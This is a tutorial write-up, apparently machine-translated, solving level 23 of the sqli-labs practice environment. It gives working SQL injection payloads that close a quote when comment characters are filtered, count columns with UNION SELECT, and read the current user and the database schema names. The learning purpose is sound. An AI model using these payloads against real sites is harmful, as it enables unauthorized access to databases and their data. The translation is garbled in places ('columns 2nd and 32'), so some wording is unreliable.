Sqli-labs (10) (Filter comment characters)

23rd Pass:

This is also a get type, string, single-quote, the error of SQL injection, Input id=1 ', the page will be error

We continue to follow the previous routine, first input? id=1 ' or ' 1 ' = ' 1

The normal display of the page indicates that there is a good chance that SQL injection will be present in this place. Continue typing? id=1 ' or ' 1 ' = ' 1 '%23

found that the page unexpectedly error, from the error message found that our comments are not actually, the background to the comments in the filter.

In this case, there is no way to partition the SQL statements behind the comments, only with a closed method. But one thing here is that in the actual test, the number of rows in the table is not known, and the order by is not available here. Because the order by is generally at the end of the SQL statement, and then using the ' closed ' single quotation mark after the order by, SQL will ignore the order by.

For example, we input? Id=1 ' ORDER BY and ' 1 ' = ' 1

The program will never go wrong, and it will not be possible to use Oder by for judgment. There's only a little bit of a try here.

In turn, enter

? id=1 ' Union SELECT ' 1

? id=1 ' Union Select 1, ' 1

? id=1 ' Union Select 1, 1, ' 1

Found to come to an error, and the last one does not error, indicating that the current query table column number is three columns.

After you know that it is three columns, continue typing later

? id=-1 ' Union Select 1, 2, ' 3

As you can see, the data for columns 2nd and 32 are displayed, and since the third column is used to close the following single-cited symbols, we can only use the second column for the query operation.

Input? id=-1 ' Union Select 1, User (), ' 3 ' current user name at query

Input? id=-1 ' Union Select 1, (select Group_concat (schema_name) from Information_schema.schemata), ' 3

Sqli-labs (10) (Filter comment characters)